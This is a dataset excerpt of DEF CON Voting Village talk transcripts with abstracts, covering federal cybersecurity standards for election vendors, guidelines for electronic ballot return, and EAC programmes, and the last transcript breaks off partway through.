doi
stringlengths
17
24
transcript
stringlengths
305
148k
abstract
stringlengths
5
6.38k
10.5446/50753 (DOI)
Hello. It's nice to be here. Thank you for joining this session. I'd like to talk today about a policy approach to resolving cybersecurity problems in the election process. One thing's for sure. After the coronavirus is no longer dominating the news, election security will come back to center stage big time. It's not a complicated subject that few, it is a complicated subject that few people really understand, even election officials. So today I want to talk about the role that private sector companies play in the voting system, the vulnerabilities associated with their role and discuss a path forward from the legal and policy perspective. So election security, it's really a private sector problem. Election security, there, there, it is so many aspects of it are performed by private sector companies. There are many avenues for tampering with an election, including changing votes, causing machines to malfunction, altering voter registration records, and disrupting equipment to be used that's used to check in voters. The private sector companies play a large role in these activities, which we call the election process, the voter registration, the checking in, the voting, the polling, the tabulating of the votes, all that is called the election process. And the private sector companies sell the voting machines and program them for most elections. Yes, they program them for each individual election in most jurisdictions. They register voters, they tally votes, and they report votes. And there are vulnerabilities associated with their role that most people don't understand. They think that this is all something controlled by state and local election officials, and it is not. So today I want to talk about a path forward and how to solve this huge complicated problem. There are many avenues for tampering with an election, including changing votes, causing machines to malfunction, altering voter registration records, and disrupting equipment used to check in voters. Let's look at the vulnerabilities in the voting equipment. In 2005, Hari Hirstie performed the famous Hirstie hack and successfully altered votes in a one-step hack that changed both central tabulator results and the voting machine results tape. It was the digital equipment of stuffing the ballot box. The election official who invited Hirstie to check the default acu-vote optical scan voting machines said he wouldn't have been able to detect the change and would have certified the election. Debold is now owned by Dominion voting systems. None of the vulnerabilities found by Hirstie were ever fixed, and these same machines are planned for use in 20 states in the 2020 election. Think about that. It's 2020 and he discovered this in 2005, 15 years later. That's crazy. A later model of the same voting machines with the same vulnerabilities was used in a hotly contested and disputed 2016 election between Stacey Abrams and Brian Kemp and Georgia. So many of these systems that are using these machines are using machines with these vulnerabilities. In recent elections, 99% of votes in the US were cast or counted on computers. And many of the core election systems, voter registration databases, election management systems, voting machines, and vote counting systems, are using aged computer equipment. The systems employ software that can no longer be updated or patched. They include databases that have known vulnerabilities, and they're managed by third-party vendors where supply chain risks exist. This is a big problem. Let's look at the cyber attacks on these private vendors. In 2016, Russia's military intelligence service penetrated VR systems. VR systems is the vendor that manages and handles all of the programming for the majority of the counties of Florida, and it handles all absentee ballots and early voting. We know of this penetration because an NSA contractor, Reality Winner, released a top secret report about it. And we later found out the FBI briefed election officials in Florida on a very secret basis. It was a year later that election officials around the country realized that Russia's military intelligence service had been penetrating VR systems, and that perhaps their systems might also be vulnerable. In the 2016 elections, electronic voter ID systems in several states went down in certain precincts. Now, these are the systems that help identify a voter when they come into vote. And these technical glitches they called them in the machines called hours-long waits for people who had come to the polls to vote. Hours-long waits. Some voters were unable to wait, and others could not vote before the polls closed. On election day in 2019, federal officials from law enforcement, Homeland Security, and the intelligence community issued a joint statement declaring that our adversaries want to undermine our democratic institutions, influence public sentiment, and affect government policies. Russia, China, Iran, and other foreign militias actors all will seek to interfere in the voting process or influence voter perceptions. Wow. And it's true. We have a serious problem. We have governments from outside the U.S. trying to influence our democratic processes, and we have voting machines and voter ID systems and private sector companies that have not presented any level of security and assurance that their processes and systems have integrity and are confidential. So we have a U.S. Election Assistance Commission, and this commission is supposed to help the election officials around the country, but it's perhaps the weakest link in the nation's voting system. The EAC is a bipartisan commission established by Congress in 2002. It maintains a national mail voter registration form. It accredits testing laboratories and certifies voting systems, and it serves as a national clearinghouse of information on election administration. In December 2016, Recorded Future reported that a Russian-speaking hacker named Rasputin was selling access to the EAC systems on the Internet. Rasputin had full admin access to the database and could upload any file he wanted. He had lists of voting machinery, test reports of their software, and knew where they were deployed. An EAC employee whose credentials had been compromised said if Rasputin had access to the database, he could access the server where the proprietary information is kept. The EAC keeps information about vulnerabilities in voting systems. Thus, a hacker who gets into the EAC could find out where the weak links are in the voting systems all around the country. So, let's look at the voting machine companies and what role they have played in this. They have been recalcitrant and arrogant. Researchers and cyber experts have found multiple vulnerabilities in the most used voting machines that would enable an attacker to gain full access to a system, change configurations, and install a modified operating system without election officials knowing. These vulnerabilities can enable hackers to change an election, shut the system down, enable remote execution of code, and offline ballot tampering. There are three primary vendors for voting machines, electronic systems and software known as ESNS, Dominion voting systems, and Heart Intracevig. We know there are vulnerabilities in most of the voting machines, but very little is known about the security of these companies own IT systems. The companies that produce these voting machines that are supposed to maintain them and produce them and they are the underpinning of the core in our election process. Very little is known about the security of the companies that even manufacture these machines. Some voting machines are optical scanners, some have touchscreen voting, some use QR codes or barcodes, and others send votes in clear text back to vendors to be tallied. They can all be hacked or compromised. If almost all the voting prescends in our clunky system use equipment from these vendors, an attacker only needs to hack the equipment to reach all of the voters. Unlike major technology companies such as Apple and Microsoft, these vendors do not allow researchers to test their equipment and review their code to find vulnerabilities and bugs. The symbiotic relationship between tech software and hardware vendors and researchers helps them improve their products and keep them secure, but this is not happening when it comes to voting machine manufacturers. They will not let the researchers have access to their equipment. Voting equipment companies have been highly resistant to any review by the research community claiming their systems are safe and secure, yet they have failed to fix identified vulnerabilities in the voting equipment. They repeatedly claim everything is fine, we're all secure, this is a priority, we take the seriously, America's voting is just our basic concern, and they don't fix vulnerabilities that researchers have found for 15 years. They let their voting machines be out front and used for voting knowing they have vulnerabilities in them. I guess they think no one's going to exploit them, but really to cover that up and try to say they're all safe and sound, that's just wrong. So during the three years of the voting villages existence, I think most of you are familiar with voting village, none of the vendors have supported the effort, nor have they been willing to donate or offer equipment. While the researchers in the voting village, they're dedicated to this, because one, they want to help develop a community of cybersecurity experts and election security. There are not very many experts out there who know how to deal with election voting machines and cybersecurity problems and how to solve those vulnerabilities. And they also want to make the voting machines more equipment and equipment more secure by letting these vulnerabilities be known. The problem is the vendors are doing nothing about it. And apparently the election officials also are not requiring them to fix these vulnerabilities before they have another election. So that's a big problem. So I want to put forth a proposal to address this problem and achieve results. Certain actions can be taken at the federal level that will push a standardized approach out to state and local election officials and will require certain actions to be taken by private sector companies. Article one, section four, the U.S. Constitution grants Congress the power to regulate the times, places, and manner of holding federal elections. Federal elections deal with elections of senators, representatives, and the president. Now, state and local election officials are responsible for conducting all elections, but they depend on infusions of federal funding to supplement their state and local funding. So state and local officials can't really afford to have separate equipment and systems, one for state elections and one for federal elections. So when federal election officials or federal election Congress mandates certain requirements for federal elections, they pretty much have to go along with those because they only have one system for voting. So therefore, if Congress sets requirements for federal elections and restricts the funding that these state and local election officials need, they can only have one system for voting. So that's what state and local election officials need. To only those election agencies that adhere to federal requirements, we will begin to see consistent actions taken across the U.S. that will tighten cybersecurity in the election process. So this proposal that I want to go over with you today is such a proposal to have federal requirements set by Congress. The first would be to direct NIST, the National Institute of Standards and Technology, to establish federal standards for cybersecurity. NIST is the entity in the government that has established all the federal information processing standards. It's established all of the cybersecurity best practices and standards that have been put forth by NIST that federal agencies have to adhere to and certain federal contractors. So they have a deep bench of expertise in not only standards and cybersecurity, but in secure engineering practices. And it would be appropriate to direct them to develop federal standards for cybersecurity of our election system software, the infrastructure and the hardware, all three levels that are used in voter registration, vote tallying, voting, polling, and in the manufacturing, servicing, or writing of election parameters of voting machines and equipment. The first covers the systems, the infrastructure, the hardware, the software, the hardware, the network that they're using. What are the standards for that? Because that is used in registration, in tallying and voter polling. Again, this isn't just one thing of one machine and go to the poll and vote. This is registering to vote. It's signing in and being IDed. It is voting. It's tallying the votes. It's polling the votes, the voters, and it's reporting the votes. All of these actions are largely performed by private sector companies who we don't have any idea how their cybersecurity program is, whether it's mature or not. We suspect it's not very mature, but that's just a suspicion. But we should have a standard for saying it must meet these standards. Our democracy depends on it. That's worth the standard. And then we have in the manufacturing, the servicing of voting machines and equipment. Absolutely. We want these vulnerabilities fixed. They need to be serviced and maintained and have integrity. The writing of election parameters means the programming of these machines. In most of the jurisdictions, the private sector companies program these machines for every single election. We need standards to govern how that's done. Second is we should directness to establish a certification process for the security and integrity of election systems, software, infrastructure, and hardware, and associated components and modules of the election process. So there should be a certification process to make sure they're meeting the standards. Next, we should directness to analyze the private sector's role in the election process and recommend any roles or functions that should be changed or restricted to public sector election officials. There are some roles being undertaken by private sector companies that perhaps should not be a private sector activity. Perhaps that role should be strictly a governmental function. But let's next analyze that in all of their work in establishing the federal standards and the certification process and recommend to Congress roles that should be perhaps reserved to the public sector. Next, we want Congress to pass a law restricting federal funding to those two election jurisdictions to only those jurisdictions that one use such funding in a manner consistent with the NIST federal election standards. And those jurisdictions that require annual cybersecurity assessments by an independent third party of all the systems in the election process in accordance with the standards that require annual cybersecurity assessments by a third party of all private sector companies involved in the election process in accordance with NIST standards and to make these assessments available to election officials contracting with them. A company may get a cybersecurity assessment but it may not share it. We want them, we want these vendors to have to get third party assessments every year and share those assessments with the election officials contracting with them. And we want the election officials to get third party assessments of their systems in accordance with the NIST standards. This is what private businesses do every day. That's what's required of them. This is not asking too much of election officials or private sector vendors that support the democracy that this country has been built on. We also want federal funding restricted to those jurisdictions that establish requirements for post-election auditing of votes, at least on the level of risk limiting audits and to make the findings public. So restricting federal funding to only those jurisdictions that comply with the NIST standards, the conduct of risk assessments themselves, that make their vendors get the assessments, and that have post-election auditing. There's a precedent for this. Congress has passed laws in the past to restrict highway funds to only those jurisdictions that lower the speed limit to 55 miles an hour. Congress has restricted funds to only go to those school districts that would adjust their cafeteria menus to comply with the new recommended federal menu. There are numerous other examples, but the Congress has in the past in several instances tied its federal funding to meeting certain requirements. There's nothing more important than having our federal funding tied to meeting the requirements that our vote counts, that every vote should be counted and it should be counted as cast. The American Bar Association, which represents over 400,000 attorneys, recently adopted resolution 118, which calls for these exact measures. Cybersecurity best practices and standards can help because election security is not going to get solved overnight, but standing up a cybersecurity program for election assistance that's in compliance with cybersecurity best practices and standards will be a first big step. Congress may not pass a law right away, but election officials should already be doing this. They should already be saying, we have NIST standards for cybersecurity programs. There are ISO standards. There's multiple standards out there for cybersecurity programs, and every single vendor should be adhering to those. They're not only using equipment with vulnerabilities, their own networks and systems are vulnerable as well. So it's time election officials step up and take action, even before Congress does. They should require election officials, should require election vendors to meet cybersecurity standards and best practices, conduct annual risk assessments of their program's maturity, and do what every other business do, will do, manage its risk. In addition, they need to follow the lead of California and other jurisdictions and higher experts to test the security of their voting machines and equipment and then demand that vendors close any vulnerabilities found. Why are these officials letting machines with vulnerabilities that have been known for 15 years be used in their jurisdictions? That's crazy. They need to demand these vulnerabilities be fixed, and they need to join with each other nationally and ensure that those machines are not used in elections. So legislation and other reforms are needed, but election officials can achieve these things through their own direction and in legal agreements with their election vendors, and they should begin now and do as much as possible before November. Thank you very much. you you you you you you
Cybersecurity researchers keep identifying cybersecurity vulnerabilities in voting machines andin the election process, but not much happens in closing identified vulnerabilities. The privatesector vendors involved in voter registration, manufacturing and programming voting machines,and vote tabulation are less than responsive and few have not provided evidence that they havestrong cybersecurity programs that meet best practices and standards and regular have cyberrisk assessments performed. This presentation will put forward a federal policy approach thatwill help correct these problems and advance the integrity of elections across the country.
10.5446/50755 (DOI)
Good afternoon, Voting Village. My name is Forrest Senty. I'm the director of business and government affairs at the National Cyber Security Center. And I'm Maddie Gullickson, and I'm the program manager for Secure the Vote. We'd like to thank all of you for having us here today. We're excited to have our presentation accepted to the Voting Village. We look forward to future years in our work and elections. So we're with the National Cyber Security Center. We're a 501C3 based out of Clark Springs, Colorado. We were founded in 2016, and a lot of our big focus has to do with cyber innovation and awareness and solving world cyber problems. We work in areas like space, where we actually have a presentation from one of our fellow colleagues in the aerospace village today, as well as areas like Smart City Technology, like SCS and K-12. So being the future of the cyber workforce. Our presentation today is about the electronic ballot return standards and guidelines, titled the future of voting. I want to start off by talking a little bit about who we are, what the program is, and kind of how we fit into this whole picture. I want to start off by acknowledging that Secure the Vote is a nonpartisan, multi-agency, multi-policy group that kind of goes after a layered challenge. A lot of the different things out there with groups like EAC, CIS, CIS, the Election Security ISAC, even groups like Verify Voting, MIT, the Alliance for Security and Democracy, all tackle different aspects of our election security problem in the US. And the combination of all of these has led to a brilliant ecosystem in the United States that allows us for us to be able to publish and listen to and advocate for different policies, standards, guidelines, whether it be at the federal or state and local levels. And a lot of our focus has primarily been on the ways that we can identify different gaps in critical infrastructure related to elections. So the first gap that we've really identified, that we really want to talk about, the reason why we're here today again, is all about this gap where security exists in the conversation of election technology. Security traditionally over the past four, five years has become the even heightened level of focus in the role of election security. So we're not gonna say that we're gonna become the new experts, but the biggest thing for us is all about identifying the critical piece of the future of voting technology. And what it means is that we've identified that security, cybersecurity specifically, is a barrier to the future of election technology. And what that looks like is that if people with disabilities or overseas voters or even the everyday person who might have an emergency come up and they can't get to their mail ballot or in-person voting, that there's more and more calls, especially after the pandemic if you want to do this. But the biggest thing when the community agrees that security is an issue and is a barrier to the future of what these technologies can go. And that's why we're interested in the conversation today. A little more back on us and how we've kind of learned more about this space and why our program was started in the middle of 2018, specifically to work on helping address security issues for overseas voters. Since then, we've participated in reviewing post-collection law and we've got feedback from jurisdictions and 10 pilots involving the use of mobile and online voting between 2019 and 2020. And like all critics of online social voting, in every single pilot, we saw the need for enhanced reduced technologies. We also saw that there was also increased demand. Of the pilots we worked in, there was at least two to one, if in some cases three to one, and more demand for more places to use it. But the number one reason people chose not to is because of security concerns. So the more we try and understand these technologies and find and understand the different things that address the gap, which mean where we are today, where we are tomorrow, consistently between election officials, the security community, and the academic community, we consistently see that these knowledge technologies not going away, but the desire for them is growing and to go back to the beginning, security is still a barrier. So, ready? And through those pilots, some of the things that we have seen that are part of that core security problem are critical need for end-to-end verification of votes that maintains the secrecy of the ballot, critical need for common standards around voter verification procedures and policies. Again, there's really no federally mandated or even state mandated requirements around these newer technologies. And so there is a need for common security and a need for common standards around voter information privacy procedures as well. And also one of the biggest concerns is that vulnerability of the voter's devices that may have problems on them that could hurt the system and interfere with the vote. And so we really need to have a system in place and standards in place that these newer technologies can be held accountable to. We need pre-election reviews and post-election reviews. We need the same kind of a level of guidelines that are offered through the voluntary voting system guidelines to the EAC. And that's really where we are working with, we have a working group that is looking at these different issues. We continue to look at these issues through the pilots. But ultimately, again, we're really working on these questions because even in 2016, there were about 3 million overseas voters who were eligible to vote, but only 6.9% of them actually submitted a ballot compared to a 72% rate of domestic voters who were eligible to vote. We're doing this because if disabled voters had had the same access that voters without disabilities had in the 2018 election, we would have seen a rate increase of about 2.35 million additional voters participating in the system. Ultimately, we live in the 21st century and we shouldn't accept that people living overseas or with disabilities don't vote because they struggle with access to voting centers or because they lack the privacy to do so. And this slide in particular just demonstrates that technology is a part of voting and it is part of our infrastructure. We have email and fax are already continually used by over 31 states. We have web portals that are allowing people to return a ballot via a web portal. So the technology exists, it's moving in that direction. Again, we just believe that there needs to be a common set of standards and guidelines that can be used to help provide those guardrails as this technology develops. When we look back at our progress in voting, one of the biggest things in the Strives Home, the point that Forest was making is we see that most of our legislation around voting has had to do with undoing policy barriers that have kept actively kept people from voting. For the 21st century, what is that gonna look like? It's gonna look like trying to undo the barriers of technology and security as the thing that prohibit people from voting. And so as we look to that future, we wanna participate with as many people as possible and collaborate with as many people as possible to figure out what does that future state of voting look like? What is the timeline gonna look like in the next 10 to 30 years of legislation that we see, of technological advancements that we see? These are some ideas, these are some of the things that we'd love to see happen. And we understand the concern about these types of technologies taking place today. But the point is that it isn't going away. And so how do we work together? How do we come together to figure out how to make these things happen? Because we believe that with the collective genius of the elections community and of the security community, we can make an end to voter verification a reality. We can make full scale citizen audits of these a reality. And so this is what we envision when we see the timeline going forward and what gets us excited about it. There's with the different organizations that we've worked with, blockchains than one of the ways that people have been able to, one of the technologies that people have used, is that the right way? Does it complicate things or does it make it safer? And then we can look at AWS as the secure cloud service. Is that the right way? These are the kinds of conversations that we need to be having, not just the binary conversation of it shouldn't or it should, the fact is that it is. And so we have to have that conversation about what this looks like moving forward. And really that's the full circle of where we wanted to come to the voting village, which is really that we want feedback. We know so many of you have thought through these things and we wanna provide that place where you can offer your advice and your feedback on how we can make these things the safest, the most secure, but ultimately the most accessible because that's the whole point of this thing in the first place. And to get really sentimental about voting, I mean, it is truly the better rock of our representative democracy. If we still have significant barriers to voting, that whole piece, the integrity of that institution in itself is undermined. And so we want your feedback. And so if you have thoughts, questions about it even, please email us at securethevoteatcyber-center.org. We also will have an RFI that's gonna go live this month for solutions to some of these key issues like we talked through that are associated with mobile or online voting. So please email us to receive an notification when that goes live. If you've got that next brilliant idea of how you think you can tackle a piece of this. Absolutely. Well, a big thanks again to the voting village for having us. We wanna thank you and just reaffirm that this issue is not just a security community issue. This goes out to all the different election officials, government organizations, nonprofits, and think things out there that are all working on this. Whether you're against it or for it is a component of this that will be driving into the future. And if it's going to happen, the best thing we can do is make it as secure as possible. So thank you. Hi, this is Colorado Governor Jared Polis. And I wanna thank everyone involved with this effort to secure the vote. Voting is the most sacred right that we have in America. It's the right that protects all of our other rights. Which means that we need to do everything that we can to safeguard voting. I'm proud that Colorado has been a national model for voting rights. With our all mail ballot system that guarantees paper trail for every vote, same day registration, and so many other protections, we're not only recognized as one of the most secure election states, but one of the top states for voter participation and turnout as well. But we can't rest on our laurels and our past success. We need to continue to meet the challenges today and tomorrow. Which is why I'm proud. The one initiative led by the National Cybersecurity Center started right here in Colorado to secure the vote pilot program. Where over 4,000 Coloradans used a blockchain secured mobile voting application to cast their vote. That program from Denver has since expanded to six other states, and now includes other technologies to also secure our vote and empower voters. Free and fair elections are the bedrock of democracy. And we need to work together to protect the integrity of our elections together. Thank you for your work on this critical and important initiative to make sure everyone has confidence that their vote will be counted. Good afternoon. My name is Jocelyn Bacaro. I'm the director of elections for the city and county of Denver. And I want to thank the National Cyber Security Center for the invitation to be a part of this video. I am here because COVID-19 has highlighted the need for more options for voters to vote safely and securely. Particularly voters with disabilities. Many states already offer some form of electronic delivery and return for some voters. But unfortunately, these voting technologies exist without robust standards for safety and security. This crisis has shown why we can't wait. We need all levels of government security, policy and technology to join with election officials to establish better standards and guidelines to implement new technology solutions so all voters can vote safely and securely. Thank you so much. Hi, my name is Amelia Powers Gardner. I'm the Utah County Clerk Auditor. And I'm here to bring you a challenge. One that I'm confident you can accomplish. As you know, this week we mark an important milestone. Astronauts safely returned to Earth from the space station for the first time aboard a private vessel. Add to that the mere fact that we have put men on the moon can 3D print internal organs. And there's even emerging technology that can edit DNA. Technology has radically transformed the human experience and solved a great number of our challenges, both large and small. It's time to start finding voting solutions for the 21st century. It's no longer acceptable to suppress votes of entire demographic or to accept low voter turnout because of weather, natural disasters, or a pandemic. Mobile voting is the future of elections. Upcoming generations demand it. And our current generations need to embrace it as a solution to age old problems with voting. Our current voting methods require extensive logistics and cost a lot of money while still failing many voters, including those with disabilities, those with lower socioeconomic status, and our men and women serving us in the military. It's time to stop saying it can't be done and it is time to start finding a way to do mobile voting. The industry needs to create standards that innovators can strive to accomplish and that election administrators like myself can use to judge potential solutions by. Join me in improving the way we do democracy in the 21st century. Thank you.
The emergence of new electronic ballot return methods creates an opportunity for greater vote access and potential enfranchisement, but also raises concerns about security in an increasingly tumultuous cyber-election landscape. The challenge of security is further compounded by a lack of proactive guidance from the federal level on developing these new technologies, leaving a gap in the secure development of the technologies to adopt an elections framework and approach to security. Experts from the National Cybersecurity Center (NCC) will offer a draft of security guidelines for the new electronic ballot return platforms to consider, and for federal agencies to adopt. The guidelines format mimics the Voluntary Voting System Guidelines created by the Election Assistance Commission.
10.5446/50756 (DOI)
Good afternoon. My name is Ben Hublin and I'm Chairman of the U.S. Election Assistance Commission, or EAC. I appreciate the opportunity to speak at this year's virtual voting village. I wish I was able to be there in person. Last year I certainly enjoyed the experience and saw a real step forward in the dialogue and discourse around making our elections more secure. I'll jump into that more in a minute, but for some background, I wanted to start by talking about the EAC and what we do. The EAC was established by the Help America Vote Act of 2002, or HAVA, which was Congress's response to the Florida 2000 election. The EAC is an independent bipartisan commission charged with ensuring secure, accurate and accessible elections by developing guidance to meet HAVA requirements, adopting voluntary voting system guidelines, or the VBSG, and serving as a national clearinghouse of information on election administration. The EAC also accredits testing laboratories and certifies voting systems, as well as administers the use of HAVA funds. We are a small agency, which you might not know by the attention we get. We certainly try to punch above our weight class as an agency with one of the smallest budgets in the federal government. But as an agency, we are committed to providing helpful and up-to-date information to promote the continuity and integrity of election administration, despite new challenges such as COVID-19 and cyber interference. In FY20, the EAC received a budgetary increase from our all-time low, and as an agency, we focused on investing these precious resources wisely in a way that would help the elections. I'm pleased to be able to tell you today that a number of our new initiatives are already underway and hopefully are already making an impact. As part of our efforts, the EAC launched the Cyber Access and Security Program this April to provide access to security training, best practices, expertise, and other assistance for election officials and their IT staff. An important part of this program has been the addition of staff who have a range of experience in the cybersecurity and elections fields, including years of expertise in software development and security analysis. The program partners with public and private security experts with a goal that election officials will have access to the most up-to-date and best-in-class information available through the EAC's Clearinghouse. One of the Cyber Access and Security Program's first projects was in response to a concern we'd heard from election officials about the volume of cyber expertise and recommendations that were being developed around the election space and how it would be helpful to have an organized repository. The EAC's election security preparedness page is designed to be a one-stop shop for election cybersecurity guidance. It includes resources from federal agencies, nonprofits, academia, and local election officials. These resources include the work of a number of individuals associated with the voting village, so thank you. The page was recently updated with new guidance on security topics that have developed since the 2016 election, and it's been reorganized to make the information easier to find and use. In addition to pulling resources together, we've recognized that many of the great resources that have been produced only realize their full benefit of election officials have a solid foundation to view them from. With that in mind, in June, the EAC announced online cybersecurity training offered at no cost and developed specifically for election officials through a partnership with the Center for Tech and Civic Life, or CTCL. The online training consists of both video and written materials separated into three modules, Cybersecurity 101, 201, and 301. This is self-paced training and it provides foundational knowledge on cybersecurity terminology, best practices in election offices, practical applications, and communication around cyber incidents. We hope this is a resource that can benefit any local election official and their staff. We've been promoting it to local election officials and you can too. This is available to every state and local election official in the country at no cost through May of 2021. So far, nearly 200 state and local election officials who are responsible for running elections for millions of voters and their partners have completed this training. We plan to continue to focus on training efforts going forward, particularly if our funding trend continues. I would also mention that later this month we're launching both a risk management and a crisis management online workshop for state and local election officials. Along those lines, we'll be hosting a joint effort with CISA, an online risk management tool, allowing election officials at the local level to easily measure and mitigate risks to their specific environments. Finally, our cyber access and security team is updating materials currently posted to the EAC website and is working to develop new material related to vulnerability disclosure programs, social engineering mitigation, and other education efforts. Another area our cyber access and security team has been working on is non voting election technology, not the best name, but an area of great importance when it comes to securing our election infrastructure and maintaining public confidence in the electoral process. First and foremost, I think we all recognize that when you look at the cyber risk profile of elections that non voting election technology like poll books, election night reporting, and statewide voter registration databases are all potential targets. This is not a secret. Everyone's been talking about this since 2016 and in fact there have been a number of bills introduced in Congress to try to do something about the fact that we don't have standards or certification program for this type of technology, even though some states do. We know, however, that the nature of these systems don't necessarily lend themselves to a voluntary voting system guidelines style certification program. With that mind, the EAC has partnered with the Center for Internet Security or CIS and a number of states to pilot a technology verification program, focused on non voting election technology, including, as I mentioned earlier, electronic poll books, election night reporting websites, and electronic ballot delivery systems. This program is called the rapid architecture based election technology verification or rabbit the it relies on a risk based approach that allows rapid verification of manufacturers security claims. The rabbit the pilot program supports agile software development with a verification process that anticipates and supports rapid product changes. The goals of the pilot program include incentivizing high quality modern design of it systems, updated and smaller more manageable cycles that reduce costs of verification and re verification with more reliable and consistent outcomes for the purchasers of these systems. I'm not excited about the prospects of this pilot, but no matter what I'm confident that we'll learn more about how to think about these technologies and can apply those lessons moving forward. We're committed to expanding the EAC's clearinghouse function to include information and best practices around non voting election technology. Speaking of voting technology, certainly there's nothing more central to the AC's mission than the voluntary voting system guidelines. The VBSG are the benchmark for voting system usability and security across the country. Unfortunately, the standard that is primarily used was written over a decade ago, and therefore preceded many of the more recent technical innovations that we see in other areas of our lives. The update process for the VBSG is is very public and very technical. We received over 1600 unique public comments on the draft principles and guidelines we heard from industry stakeholders voting advocates and members of the public. I'm hopeful that the VBSG 2.0 is on track to be approved by the end of the year. In order to meet that deadline, the AC is working on several parallel paths addressing the VBSG 2.0 technical requirements, test assertions, the testing and certification program manual, and the voting system test laboratory program manual. So we've got our work cut out for us, but again, we're pushing through on this and we're working on all of these areas right now to try to get it done by the end of the year. You know, speaking of the end of the year, as we look at the 2020 election, you know, certainly it's important to look back at the 2016 election and where we've come. As I look at the elections community, it certainly come together and made tremendous progress since 2016. And the first voting village at DEF CON in 2017, the EAC regularly collaborates with partners at the federal, state and local levels. Earlier you heard from some of those federal partners at NSA, SISA and FBI. We also work with the National Association of Secretaries of State, National Association of State Election Directors, and local election official organizations to help reach the nearly 9,000 local election officials across the country. Today, election officials are better educated about cyber and physical threats to their systems and have access to resources to better help defend those systems. Manufacturers of voting equipment are also changing their behavior. They are reporting and sharing threat intelligence, opening up to researchers via bug bounty programs, and working with the EAC to issue critical software patches much more quickly. And so certainly, you know, it's hard to think about elections right now without thinking about the upcoming 2020 election. And the impact of COVID-19, certainly that's why this voting village has been done virtually. And COVID-19 is presenting unprecedented challenges around our country. And of course, election and the election administration community is facing real challenges in determining how to best conduct elections in this environment. At the EAC, we've pivoted substantially to focus our attention on how we can support state and local election officials as they learn from their primaries and make tough decisions about the general election. Between the CARES Act, election money, and the earlier Consolidated Appropriations Act of 2020, EAC has distributed about $825 million to the states this year to assist with federal elections. And we know this funding will be crucial because of the additional expenses related to running elections during the pandemic. For most jurisdictions, that means running the largest mail or absentee ballot election they've ever run, but also having safe in-person options as well, which means social distancing in the polling places and personal protective equipment being available. And so in ways to address that, we have, since April, we've held public hearings. We've also hosted a number of Zoom videos or web chats where we've brought together experts from the elections field to discuss these best practices and lessons learned on relevant topics to running an election right now during the pandemic. We've heard about challenges and lessons learned from ramping up vote by mail and heard very practical examples and success stories, as well as pitfalls and how to avoid them. Because each state runs elections somewhat differently, each response to this pandemic has been somewhat different. The changes to the election process, you know, we know that creates an environment that could be taken advantage of for misinformation or disinformation. So certainly that is an area of concern, an area that we can need to continue to work on. As you know, we've seen the dates of primaries change. You've seen processes and procedures change. You know, there will be different polling places, because some are not available, maybe they were in somewhere like a senior center that's no longer available. And so efforts like the National Association of Secretaries of States, Trusted Info 2020 effort will be even more crucial. And it is to the degree that that folks from the voting village and other communities can help promote state and local election officials is that trusted source, pushing out that information that we know is accurate and helping to combat disinformation is going to be crucial this election here. And speaking of ways for the voting village to help out, you know, we know there's plenty of work to do and more work that needs to be done. Election officials, like I mentioned earlier, absolutely, you know, working around the clock to adapt to the COVID environment, certainly can use assistance, as I mentioned before, on misinformation and disinformation. But also, you know, researchers, one way to help is to responsibly engage with election officials and manufacturers. The Cyber Security and Infrastructure Security Agency, or CISA, recently published a guide to vulnerability reporting for Americans election administrators. It walks election officials through the steps of establishing a vulnerability disclosure program so that researchers don't end up having their bug reports ignored or having their activities reported to the FBI as hacking attempts. Another way to help this year is to serve as a poll worker and reaching out to your local election official to see if you can sign up. And that blazes promoted this for some time, and I certainly appreciate his poll worker recruitment efforts. But this year, poll workers are needed more than ever. It's never an easy thing to recruit poll workers, but we've seen a significant dropout with COVID-19. Obviously, in a pandemic, it's a personal decision about serving as a poll worker. But if you're able and willing, that is desperately needed. In fact, the EAC is announcing that September 1, we're going to push National Poll Worker Recruitment Day this year to try to help election officials around the country get enough poll workers. By encouraging more people to become poll workers in their communities, National Poll Worker Recruitment Day aims to address the critical shortage of poll workers, strengthen our democracy, inspire greater civic engagement and volunteerism. And help ensure free and fair elections in November and beyond. While the specific duties and compensation vary, depending on location, poll workers are the face of the election during voting. Most jurisdictions task election workers was setting up and preparing the polling location, welcoming voters, verifying voter registrations, and issuing ballots. Poll workers also help ensure voters understand that voting process by demonstrating how to use voting equipment and explaining voting procedures. Poll workers with technical backgrounds are especially important in jurisdictions where newer voting equipment will be used for the first time. And voters may need a little extra assurance to become comfortable with the new technology. I hope to see you in person at next year's voting village. In the meantime, if there are ways the EAC can help or recommendations you have for us, please reach out. Let's keep the conversation going. And again, one last time, if you can do it, please consider serving as a poll worker. Thank you.
Remarks from Benjamin Hovland, Chairman of the US Election Assistance Commission
10.5446/50757 (DOI)
Greetings. It's great to be here even though I'm not there and we're not in Vegas. Well, maybe you are but I'm not. And after years of pilgrimage to Vegas and DEF CON and other security conferences, primarily to speak about well, privacy and security and inevitably Bitcoin, I never imagined that I would be doing this virtually, especially not for the voting villages or voting village rather than the crypto and privacy villages where I normally hang out. But with that said, I have spent significant time in the voting village and I've even included a couple photos in this presentation to help bring us back to our in-person DEF CON days. Which we will surely return to. But for now, our virtual CON is our reality. So I hope this presentation helps to educate you and brighten your summer in safe mode. Please find me on Twitter if you have any questions. I'm at Cordero underscore ESQ and with all that out of the way, let's get into it. A lawyer's reflections on elections. Let's get into it. So who is Cordero? That's me. The lawyer speaking now, providing reflections to those that will listen. And without reiterating my entire biography, I want to quickly go through a couple of these points. I'm a partner at Sublime Law, which focuses on business and intellectual property. I lead our emerging technologies practice group. And before joining Sublime Law, I worked at a forensics and cybersecurity professional services firm in Silicon Valley, as well as a large US law firm, where I focused on privacy. I graduated ASU law with honors, focusing on law, science and technology. And I worked at ASU's innovation advancement program. But most relevant for today, I'm a former political candidate that has a story to tell that is part of a larger and more important narrative than any single election race or election case. So what will we not be going over today? What's not on the agenda? I will not be making a political statement in support of any party. I won't be re-litigating any lawsuit or critiquing any judicial officer. So with that out of the way, let's get into the agenda of reflections. First, I'm going to explain the structure of the American government, including state and federal similarities. Second, I'm going to introduce how my lawsuit came to be, the origins of the campaign and the lawsuit that followed. Three, I'm going to highlight issues and share the oddities of election law that I learned along the way. And fourth, I'm going to share some information and some resources for your reference. And finally, as you can see on the bottom, the overall objective here is to educate and broaden the community of people that can become experts in how the system works so they can help improve it over time. Getting into it, democracy now. You may already know that the US federal system has three branches of government. And to keep things simple and to appeal to DEF CON's global audience, this slide represents how the US Constitution, through its different articles, structures the federal government. This system of co-equal branches of government is meant to accomplish an appropriate balance of powers, thereby achieving a level of accountability and independence that is good for governments. You can think of these branches of government as the rule makers, rule enforcers, and rule interpreters. But there's more to the US than the federal national government. There are state and local governments. The states follow a 